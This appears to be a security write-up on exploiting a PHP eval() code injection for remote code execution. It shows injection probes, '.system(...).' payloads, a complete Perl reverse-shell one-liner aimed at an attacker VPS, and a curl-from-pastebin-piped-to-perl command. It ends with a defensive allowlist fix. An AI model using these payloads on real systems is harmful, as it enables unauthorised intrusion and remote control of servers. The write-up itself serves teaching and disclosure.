RCE By Code Injection | Perl Reverse Shell

What is the PHP code injection weakness?

Background story

print("AbdulrahmanKamel0xx")
No reflected string
;print("AbdulrahmanKamel0xx") 
'.print("AbdulrahmanKamel0xx").'
BOOM!
Remote Code Execution

The expected backend code:

<?php
$input = $_REQUEST['local'];
eval('$input');
?>
'.system("command").'
================================
<?php
$input = $_REQUEST['local'];
eval(''.$input.'');
?>

Getting Reverse Shell

'.system("nc -v").'
No data was reflected, which means the command was not performed
Found Perl v5.20
funny meme ^_^
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Request syntax error because of the [&] sign
'.system("curl -v").'
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
curl https://pastebin.com/raw/EEaH**** | perl
...
'.system("curl https://pastebin.com/raw/EEaH**** | perl").'
Reverse Shell via Perl

Prevent PHP code injection
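
An added example, not from the original post: instead of passing the `local` parameter to eval() as in the expected backend code above, the handler maps it to a fixed allowlist and treats it only as data. It assumes `local` selects a locale, which the page does not state; `resolveLocale`, `ALLOWED_LOCALES`, `DEFAULT_LOCALE` and the locale codes are hypothetical names and constructed values.

```php
<?php
declare(strict_types=1);

// Assumption: 'local' selects a UI locale (the page does not say what it is for).
// The locale codes and labels below are constructed sample values.
const ALLOWED_LOCALES = ['en' => 'English', 'ar' => 'Arabic', 'fr' => 'French'];
const DEFAULT_LOCALE = 'en';

/**
 * Map untrusted input to one of a fixed set of values.
 * The input is only ever compared as data; it is never passed to eval(),
 * include, or a shell, so quotes and dots in it carry no special meaning.
 */
function resolveLocale($raw): string
{
    // ?local[]=x arrives as an array; anything that is not a string is invalid.
    if (!is_string($raw)) {
        return DEFAULT_LOCALE;
    }
    // Strict shape check first, then an exact allowlist lookup.
    if (preg_match('/\A[a-z]{2}\z/', $raw) !== 1) {
        return DEFAULT_LOCALE;
    }
    return array_key_exists($raw, ALLOWED_LOCALES) ? $raw : DEFAULT_LOCALE;
}

// In the request handler this replaces the eval() call:
//   $locale = resolveLocale($_REQUEST['local'] ?? null);

// Self-check using the probe strings shown earlier on the page,
// plus an array value and one legitimate value.
$probes = [
    'print("AbdulrahmanKamel0xx")',
    ';print("AbdulrahmanKamel0xx")',
    '\'.print("AbdulrahmanKamel0xx").\'',
    '\'.system("command").\'',
    ['nested'],
    'ar',
];
foreach ($probes as $probe) {
    $label = is_string($probe) ? $probe : json_encode($probe);
    printf("%-40s => %s\n", $label, resolveLocale($probe));
}
```

eval() is a language construct, so the `disable_functions` directive in php.ini cannot turn it off. Listing `system`, `exec`, `shell_exec`, `passthru`, `popen` and `proc_open` there only limits what injected code could do and does not replace removing the eval() call.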
